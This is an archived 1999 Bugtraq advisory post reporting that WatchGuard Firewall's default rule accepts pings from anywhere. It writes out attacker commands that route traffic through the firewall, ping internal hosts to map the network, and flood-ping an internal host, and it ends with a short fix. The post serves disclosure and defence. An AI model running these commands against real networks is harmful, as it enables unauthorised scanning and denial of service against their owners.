Bugtraq mailing list archives
Default configuration in WatchGuard Firewall
From: altellez () IP6SEGURIDAD COM (Alfonso Lazaro)
Date: Thu, 2 Sep 1999 13:15:36 +0200
I have found a misconfiguration in the default configuration of Watchguard Firewall.
By default it appends a rule that it accepts pings from any to any.
So if our firebox is defending our internal network ( 192.168.x.x ... )
and our WG Firewall is a proxie with an external ip in internet ( 100.100.100.100 hipotetic ip address ) the atacker
can change his/her routes like so :
# route add -net 192.168.0.0 netmask 255.255.255.0 gw 100.100.100.100
# ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=251 time=514.0 ms
^C
# ping 192.168.1.2
PING 192.168.1.2 (192.168.1.2): 56 data bytes
64 bytes from 192.168.1.2: icmp_seq=0 ttl=251 time=523.0 ms
^C
and so on ...
the atacker can now discovers internal network ip and atack them
# ping -f 192.168.1.1
Solution is easy ... do not let pings to internal network.
--
Saludos.
===========================================================
Alfonso Lazaro Tellez altellez () ip6seguridad com
Analista de seguridad
IP6Seguridad http://www.ip6seguridad.com
Tfno: +34 91-3430245 C\Alberto Alcocer 5, 1 D
Fax: +34 91-3430294 Madrid ( SPAIN )
===========================================================
Current thread:
- Default configuration in WatchGuard Firewall Alfonso Lazaro (Sep 02)
- Re: Default configuration in WatchGuard Firewall Chris Brenton (Sep 04)
- Re: Default configuration in WatchGuard Firewall Pavel Kankovsky (Sep 05)
- <Possible follow-ups>
- Re: Default configuration in WatchGuard Firewall Ryan Russell (Sep 04)
- Disabling everything Dr. Joel M. Hoffman (Sep 09)
- Re: Default configuration in WatchGuard Firewall Steve Fallin (Sep 07)
- Re: Default configuration in WatchGuard Firewall Steve Fallin (Sep 13)
- Re: Default configuration in WatchGuard Firewall Matt Bruce (Sep 14)